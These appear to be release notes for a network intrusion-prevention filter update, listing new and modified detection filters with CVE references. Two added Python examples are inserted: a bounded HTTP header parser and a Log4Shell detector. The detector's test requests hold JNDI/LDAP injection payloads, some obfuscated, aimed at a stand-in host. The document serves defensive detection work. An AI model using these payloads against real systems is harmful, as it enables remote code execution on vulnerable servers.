New Filters:
43397: HTTP: Apache Superset Database API Request
- IPS Version: 3.9.5 and after.
- TPS Version: 5.2.2 and after.
- vTPS Version: 5.2.2 and after.
- Category: Security Policy
- Severity: Low
- Description: This filter detects database API requests in Apache Superset.
- Deployment: Not enabled by default in any deployment.
- References:
- Common Vulnerabilities and Exposures: CVE-2023-27524
- Classification: Security Policy - Forbidden Application Access or Service Request
- Protocol: HTTP
- Platform: Multi-Platform Server Application or Service
- Release Date: December 05, 2023
43508: HTTP: Suspicious Internet Shortcut File Download
- IPS Version: 3.9.5 and after.
- TPS Version: 5.2.2 and after.
- vTPS Version: 5.2.2 and after.
- Category: Security Policy
- Severity: Moderate
- Description: This filter detects the download of a suspicious Internet Shortcut file.
- Deployments:
- Deployment: Security-Optimized (Block / Notify)
- References:
- Common Vulnerabilities and Exposures: CVE-2023-36025
- Classification: Security Policy - Other
- Protocol: HTTP
- Platform: Windows Client Application
- Release Date: December 05, 2023
43511: HTTP: Citrix ADC Gateway Cross-Site Scripting Vulnerability
- IPS Version: 3.9.5 and after.
- TPS Version: 5.2.2 and after.
- vTPS Version: 5.2.2 and after.
- Category: Vulnerabilities
- Severity: High
- Description: This filter detects an attempt to exploit a cross-site scripting vulnerability in Citrix NetScaler and Application Delivery Controller.
- Deployments:
- Deployment: Default (Block / Notify)
- References:
- Common Vulnerabilities and Exposures: CVE-2023-24488
- Classification: Vulnerability - Input Validation (Command injection, XSS, SQL injection, etc)
- Protocol: HTTP
- Platform: Multi-Platform Server Application or Service
- Release Date: December 05, 2023
43513: HTTP: Goteleport Teleport Command Injection Vulnerability
- IPS Version: 3.9.5 and after.
- TPS Version: 5.2.2 and after.
- vTPS Version: 5.2.2 and after.
- Category: Vulnerabilities
- Severity: Critical
- Description: This filter detects an attempt to exploit a command injection vulnerability in Goteleport Teleport.
- Deployments:
- Deployment: Security-Optimized (Block / Notify)
- References:
- Common Vulnerabilities and Exposures: CVE-2022-36633
- Classification: Vulnerability - Input Validation (Command injection, XSS, SQL injection, etc)
- Protocol: HTTP
- Platform: Multi-Platform Client Application
- Release Date: December 05, 2023
43515: HTTP: Sophos Web Appliance sblistpack Command Injection Vulnerability
- IPS Version: 3.9.5 and after.
- TPS Version: 5.2.2 and after.
- vTPS Version: 5.2.2 and after.
- Category: Exploits
- Severity: Critical
- Description: This filter detects an attempt to exploit a command injection vulnerability in Sophos Web Appliance.
- Deployment: Not enabled by default in any deployment.
- References:
- Common Vulnerabilities and Exposures: CVE-2023-1671
- Classification: Vulnerability - Input Validation (Command injection, XSS, SQL injection, etc)
- Protocol: HTTP
- Platform: Multi-Platform Server Application or Service
- Release Date: December 05, 2023
43516: HTTP: cURL and libcurl HTTP Response Headers Parsing Resource Exhaustion Vulnerability
- IPS Version: 3.9.5 and after.
- TPS Version: 5.2.2 and after.
- vTPS Version: 5.2.2 and after.
- Category: Exploits
- Severity: Critical
- Description: This filter detects attempts to exploit a resource exhaustion vulnerability in cURL/libcurl.
- Deployments:
- Deployment: Default (Block / Notify)
- References:
- Common Vulnerabilities and Exposures: CVE-2023-38039
- Classification: Vulnerability - Denial of Service (Crash/Reboot)
- Protocol: HTTP
- Platform: Multi-Platform Client Application
- Release Date: December 05, 2023
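CVE-2023-38039, referenced by filter 43516 above, is a resource-exhaustion bug in how curl/libcurl accumulated HTTP response headers with no upper bound, so a hostile server could keep sending header lines until the client ran out of memory. The following Python is an added illustration of the bounded-buffering defence against that class of bug; it is neither the DV filter's detection logic nor curl's fix. The 8 KiB budget and the hostile-server generator are assumed/constructed for the demo.

```python
"""Bounded HTTP response-header parsing (added example, not from the page).

Assumptions: MAX_HEADER_BYTES is a demo budget, and hostile_response() is a
constructed stand-in for a server that never terminates its header block.
"""

MAX_HEADER_BYTES = 8 * 1024  # assumed budget for this example


class HeaderBudgetExceeded(Exception):
    """Raised once more header bytes arrive than the budget allows."""


def parse_response_headers(chunks, budget=MAX_HEADER_BYTES):
    """Consume byte chunks until the blank line that ends the header block.

    Returns (status_line, [(name, value), ...], leftover_body_bytes).
    Raises HeaderBudgetExceeded as soon as the bytes spent on the header
    block exceed `budget`, whether they arrive as many lines or as one
    endless line, so the buffer can never grow without bound.
    """
    buf = b""
    consumed = 0
    status = None
    headers = []
    for chunk in chunks:
        buf += chunk
        while True:
            nl = buf.find(b"\r\n")
            if nl < 0:
                break
            line, buf = buf[:nl], buf[nl + 2:]
            consumed += nl + 2
            if consumed > budget:
                raise HeaderBudgetExceeded(consumed)
            if status is None:
                status = line
            elif line == b"":
                return status, headers, buf
            else:
                name, _, value = line.partition(b":")
                headers.append((name.strip().lower(), value.strip()))
        # A partial line still waiting for its newline counts against the
        # budget too; otherwise one huge line would bypass the check above.
        if consumed + len(buf) > budget:
            raise HeaderBudgetExceeded(consumed + len(buf))
    raise ValueError("stream ended before the header block was terminated")


def hostile_response(n_lines, line_size=1024):
    """Constructed hostile server: valid status line, then n_lines oversized
    headers and never the blank line that would end the block."""
    yield b"HTTP/1.1 200 OK\r\n"
    for i in range(n_lines):
        yield b"X-Pad-%d: " % i + b"A" * line_size + b"\r\n"


def run_hostile(n_lines=1000, budget=MAX_HEADER_BYTES):
    """Feed the hostile stream; return (raised, chunks_pulled_before_stop)."""
    pulled = 0

    def counted():
        nonlocal pulled
        for c in hostile_response(n_lines):
            pulled += 1
            yield c

    try:
        parse_response_headers(counted(), budget)
    except HeaderBudgetExceeded:
        return True, pulled
    return False, pulled


if __name__ == "__main__":
    normal = [b"HTTP/1.1 200 OK\r\nContent-Type: text/plain\r\n",
              b"Content-Length: 5\r\n\r\nhello"]
    print(parse_response_headers(normal))
    print(run_hostile())
```

The check is applied to bytes received, not to parsed header count, because the cost an attacker inflicts is memory, and a single header line can be as large as the transport allows.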
43518: SMB: Linux Kernel ksmbd SMB2_LOGOFF Handling NULL Pointer Dereference Vulnerability
- IPS Version: 3.9.5 and after.
- TPS Version: 5.2.2 and after.
- vTPS Version: 5.2.2 and after.
- Category: Exploits
- Severity: Critical
- Description: This filter detects an attempt to exploit a NULL Pointer Dereference vulnerability in the Linux kernel KSMBD.
- Deployments:
- Deployment: Security-Optimized (Block / Notify)
- References:
- Common Vulnerabilities and Exposures: CVE-2023-32252
- Classification: Vulnerability - Denial of Service (Crash/Reboot)
- Protocol: SMB
- Platform: Windows Server Application or Service
- Release Date: December 05, 2023
43519: ZDI-CAN-22440: Zero Day Initiative Vulnerability (Western Digital MyCloud PR4100)
- IPS Version: 3.9.5 and after.
- TPS Version: 5.2.2 and after.
- vTPS Version: Not available.
- Requires: IPS N-Platform, NX-Platform, or TPS models.
- Category: Vulnerabilities
- Severity: Critical
- Description: This filter protects against the exploitation of a zero-day vulnerability affecting Western Digital MyCloud PR4100.
- Deployments:
- Deployment: Security-Optimized (Block / Notify / Trace)
- Classification: Vulnerability - Other
- Protocol: Other Protocol
- Platform: Other Server Application or Service
- Release Date: December 05, 2023
43525: HTTP: XWiki.org AdminSheet Template Injection Vulnerability
- IPS Version: 3.9.5 and after.
- TPS Version: 5.2.2 and after.
- vTPS Version: 5.2.2 and after.
- Category: Vulnerabilities
- Severity: Critical
- Description: This filter detects an attempt to exploit a template injection vulnerability in XWiki.org XWiki.
- Deployments:
- Deployment: Security-Optimized (Block / Notify)
- References:
- Common Vulnerabilities and Exposures: CVE-2023-46731
- Classification: Vulnerability - Input Validation (Command injection, XSS, SQL injection, etc)
- Protocol: HTTP
- Platform: Multi-Platform Server Application or Service
- Release Date: December 05, 2023
43527: HTTP: ownCloud graphapi GetPhpInfo.php Information Disclosure Vulnerability
- IPS Version: 3.9.5 and after.
- TPS Version: 5.2.2 and after.
- vTPS Version: 5.2.2 and after.
- Category: Vulnerabilities
- Severity: High
- Description: This filter detects an attempt to exploit an information disclosure vulnerability in ownCloud graphapi.
- Deployments:
- Deployment: Default (Block / Notify)
- References:
- Common Vulnerabilities and Exposures: CVE-2023-49103
- Classification: Vulnerability - Access Validation
- Protocol: HTTP
- Platform: Multi-Platform Server Application or Service
- Release Date: December 05, 2023
Modified Filters (logic changes):
* = Enabled in Default deployments
* 40627: HTTP: JNDI Injection in HTTP Request
- IPS Version: 3.9.5 and after.
- TPS Version: 5.2.2 and after.
- vTPS Version: 5.2.2 and after.
- Detection logic updated.
- Release Date: December 13, 2021
- Last Modified Date: December 05, 2023
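Filter 40627 above is the DV's JNDI-in-HTTP-request check; its detection logic is not published here. As an added illustration of the kind of check such a filter performs, and not the filter itself, the following Python scans an HTTP request for JNDI lookups after undoing the nested Log4j lookup obfuscations (`${lower:...}`, `${upper:...}`, `${...:-default}`, URL encoding) that defeat a plain `${jndi:` substring match. The sample requests and the 198.51.100.7 address are constructed for the demo.

```python
"""Detect JNDI lookups in HTTP requests after de-obfuscation (added example).

Not the DV filter's logic. Requests below are constructed; the address is
from a documentation range.
"""
import re
from urllib.parse import unquote

_INNERMOST = re.compile(r"\$\{([^${}]*)\}")   # a ${...} with nothing nested
_JNDI = re.compile(r"jndi:", re.IGNORECASE)


def _resolve_lookup(m):
    """Rewrite one innermost Log4j lookup the way the attacker expects Log4j to."""
    expr = m.group(1)
    # ${anything:-default}: the default is substituted when the lookup fails,
    # which is exactly what ${::-j} or ${env:NOPE:-j} rely on.
    if ":-" in expr:
        return expr.split(":-", 1)[1]
    prefix, sep, rest = expr.partition(":")
    if sep and prefix.lower() == "lower":
        return rest.lower()
    if sep and prefix.lower() == "upper":
        return rest.upper()
    # Any other lookup keeps its text but loses the ${} wrapper, so the
    # rewrite loop terminates and "jndi:" stays visible to the matcher.
    return "<" + expr + ">"


def normalize(value, max_rounds=32):
    """URL-decode and resolve nested lookups from the inside out until stable."""
    s = value
    for _ in range(max_rounds):
        step = _INNERMOST.sub(_resolve_lookup, unquote(s))
        if step == s:
            break
        s = step
    return s


def parse_request(raw):
    """Minimal HTTP/1.1 request split: (request_line, [(name, value)], body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip(), value.strip()))
    return lines[0], headers, body.decode("latin-1")


def scan_request(raw):
    """Return [(location, normalized_text)] for each field carrying a JNDI lookup."""
    request_line, headers, body = parse_request(raw)
    fields = ([("request-line", request_line)]
              + [("header:" + n, v) for n, v in headers]
              + [("body", body)])
    hits = []
    for where, value in fields:
        norm = normalize(value)
        if _JNDI.search(norm):
            hits.append((where, norm))
    return hits


# Constructed sample traffic.
BENIGN = (b"GET /api/health HTTP/1.1\r\nHost: app.example\r\n"
          b"User-Agent: curl/8.4.0\r\n\r\n")
PLAIN = (b"GET / HTTP/1.1\r\nHost: app.example\r\n"
         b"User-Agent: ${jndi:ldap://198.51.100.7:1389/a}\r\n\r\n")
OBFUSCATED = (b"POST /login HTTP/1.1\r\nHost: app.example\r\n"
              b"X-Api-Version: ${${lower:j}${upper:n}di:${::-l}dap://198.51.100.7:1389/a}\r\n"
              b"Content-Length: 0\r\n\r\n")
ENCODED_PATH = (b"GET /search?q=%24%7B%24%7Benv%3ANOPE%3A-j%7Dndi%3Aldap%3A%2F%2F198.51.100.7%2Fa%7D HTTP/1.1\r\n"
                b"Host: app.example\r\n\r\n")

if __name__ == "__main__":
    for name, req in [("benign", BENIGN), ("plain", PLAIN),
                      ("obfuscated", OBFUSCATED), ("encoded-path", ENCODED_PATH)]:
        print(name, scan_request(req))
```

Matching on the normalized text rather than the raw bytes is the point: the raw X-Api-Version value above never contains the substring `jndi`, yet it resolves to `jNdi:ldap://...` once the lookups are evaluated the way Log4j would.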
42479: HTTP: LG Simple Editor copyTemplateAll Directory Traversal Vulnerability (ZDI-23-1201)
- IPS Version: 3.9.5 and after.
- TPS Version: 5.2.2 and after.
- vTPS Version: 5.2.2 and after.
- Detection logic updated.
- Vulnerability references updated.
- Release Date: March 14, 2023
- Last Modified Date: December 05, 2023
43051: HTTP: Adobe RoboHelp Server OnPublishFile Directory Traversal Vulnerability (ZDI-23-1652)
- IPS Version: 3.0.0 and after.
- TPS Version: 5.2.2 and after.
- vTPS Version: 5.2.2 and after.
- Name changed from "43051: ZDI-CAN-21307: Zero Day Initiative Vulnerability (Adobe RoboHelp Server)".
- Description updated.
- Detection logic updated.
- Vulnerability references updated.
- Release Date: August 01, 2023
- Last Modified Date: December 05, 2023
43068: HTTP: Adobe RoboHelp Server GetNewUserId SQL Injection Vulnerability (ZDI-23-1649)
- IPS Version: 3.9.5 and after.
- TPS Version: 5.2.2 and after.
- vTPS Version: 5.2.2 and after.
- Name changed from "43068: ZDI-CAN-21306: Zero Day Initiative Vulnerability (Adobe RoboHelp Server)".
- Severity changed from "Critical" to "High".
- Description updated.
- Detection logic updated.
- Vulnerability references updated.
- Release Date: August 01, 2023
- Last Modified Date: December 05, 2023
* 43257: HTTP: Microsoft Exchange IsUNCPath Improper Input Validation NTLM Relay Vulnerability (ZDI-23-1637)
- IPS Version: 3.9.5 and after.
- TPS Version: 5.2.2 and after.
- vTPS Version: 5.2.2 and after.
- Name changed from "43257: ZDI-CAN-21983: Zero Day Initiative Vulnerability (Microsoft Exchange)".
- Description updated.
- Detection logic updated.
- Vulnerability references updated.
- Release Date: September 19, 2023
- Last Modified Date: December 05, 2023
43468: HTTP: Roundcube Webmail rcube_washtml.php Stored Cross-Site Scripting Vulnerability
- IPS Version: 3.9.5 and after.
- TPS Version: 5.2.2 and after.
- vTPS Version: 5.2.2 and after.
- Name changed from "43468: HTTP: Suspicious SVG HTML Tag Detected".
- Category changed from "Security Policy" to "Vulnerabilities".
- Description updated.
- Detection logic updated.
- Vulnerability references updated.
- Release Date: November 14, 2023
- Last Modified Date: December 05, 2023
Modified Filters (metadata changes only):
* = Enabled in Default deployments
42235: HTTP: D-Link DIR-2640 DestNetwork Command Injection Vulnerability (ZDI-23-542, ZDI-23-543)
- IPS Version: 3.9.5 and after.
- TPS Version: 5.2.2 and after.
- vTPS Version: 5.2.2 and after.
- Description updated.
- Release Date: January 31, 2023
- Last Modified Date: December 05, 2023
42753: HTTP: Siemens Tecnomatix Plant Simulation WRL Use-After-Free Vulnerability (ZDI-23-1626)
- IPS Version: 3.9.5 and after.
- TPS Version: 5.2.2 and after.
- vTPS Version: 5.2.2 and after.
- Name changed from "42753: ZDI-CAN-20842: Zero Day Initiative Vulnerability (Siemens Tecnomaticix Plant Simulation)".
- Description updated.
- Vulnerability references updated.
- Release Date: May 30, 2023
- Last Modified Date: December 05, 2023
42756: HTTP: Siemens Tecnomatix Plant Simulation WRL Out-Of-Bounds Write Vulnerability (ZDI-23-1630)
- IPS Version: 3.9.5 and after.
- TPS Version: 5.2.2 and after.
- vTPS Version: 5.2.2 and after.
- Name changed from "42756: ZDI-CAN-20825: Zero Day Initiative Vulnerability (Siemens Tecnomaticix Plant Simulation)".
- Description updated.
- Vulnerability references updated.
- Release Date: May 30, 2023
- Last Modified Date: December 05, 2023
42757: HTTP: Siemens Tecnomatix Plant Simulation WRL Stack-based Buffer Overflow Vulnerability (ZDI-23-1632)
- IPS Version: 3.9.5 and after.
- TPS Version: 5.2.2 and after.
- vTPS Version: 5.2.2 and after.
- Name changed from "42757: ZDI-CAN-20818: Zero Day Initiative Vulnerability (Siemens Tecnomaticix Plant Simulation)".
- Description updated.
- Vulnerability references updated.
- Release Date: May 30, 2023
- Last Modified Date: December 05, 2023
42758: HTTP: Siemens Tecnomatix Plant Simulation WRL Heap-based Buffer Overflow Vulnerability (ZDI-23-1631)
- IPS Version: 3.9.5 and after.
- TPS Version: 5.2.2 and after.
- vTPS Version: 5.2.2 and after.
- Name changed from "42758: ZDI-CAN-20824: Zero Day Initiative Vulnerability (Siemens Tecnomaticix Plant Simulation)".
- Description updated.
- Vulnerability references updated.
- Release Date: May 30, 2023
- Last Modified Date: December 05, 2023
42759: HTTP: Siemens Tecnomatix Plant Simulation WRL Type Confusion Vulnerability (ZDI-23-1628)
- IPS Version: 3.9.5 and after.
- TPS Version: 5.2.2 and after.
- vTPS Version: 5.2.2 and after.
- Name changed from "42759: ZDI-CAN-20840: Zero Day Initiative Vulnerability (Siemens Tecnomaticix Plant Simulation)".
- Description updated.
- Vulnerability references updated.
- Release Date: May 30, 2023
- Last Modified Date: December 05, 2023
42760: HTTP: Siemens Tecnomatix Plant Simulation WRL File Parsing Type Confusion Vulnerability (ZDI-23-1629)
- IPS Version: 3.9.5 and after.
- TPS Version: 5.2.2 and after.
- vTPS Version: 5.2.2 and after.
- Name changed from "42760: ZDI-CAN-20826: Zero Day Initiative Vulnerability (Siemens Tecnomaticix Plant Simulation)".
- Description updated.
- Vulnerability references updated.
- Release Date: May 30, 2023
- Last Modified Date: December 05, 2023
42903: HTTP: PaperCut NG External User Lookup Code Injection Vulnerability (ZDI-23-1285)
- IPS Version: 3.9.5 and after.
- TPS Version: 5.2.2 and after.
- vTPS Version: 5.2.2 and after.
- Miscellaneous modification.
- Release Date: July 04, 2023
- Last Modified Date: December 05, 2023
43006: HTTP: NETGEAR CAX30 SSO Stack-based Buffer Overflow Vulnerability (ZDI-23-1636)
- IPS Version: 3.9.5 and after.
- TPS Version: 5.2.2 and after.
- vTPS Version: 5.2.2 and after.
- Name changed from "43006: ZDI-CAN-19058: Zero Day Initiative Vulnerability (NETGEAR CAX30)".
- Description updated.
- Vulnerability references updated.
- Release Date: July 25, 2023
- Last Modified Date: December 05, 2023
43049: HTTP: Adobe RoboHelp Server resolveDistinguishedName LDAP Injection Vulnerability (ZDI-23-1650)
- IPS Version: 3.9.5 and after.
- TPS Version: 5.2.2 and after.
- vTPS Version: 5.2.2 and after.
- Name changed from "43049: ZDI-CAN-21309: Zero Day Initiative Vulnerability (Adobe RoboHelp Server)".
- Severity changed from "Critical" to "High".
- Description updated.
- Vulnerability references updated.
- Release Date: August 01, 2023
- Last Modified Date: December 05, 2023
43098: HTTP: SonicWall GMS and Analytics searchFilter Command Injection Vulnerability
- IPS Version: 3.9.5 and after.
- TPS Version: 5.2.2 and after.
- vTPS Version: 5.2.2 and after.
- Miscellaneous modification.
- Release Date: August 15, 2023
- Last Modified Date: December 05, 2023
Removed Filters: None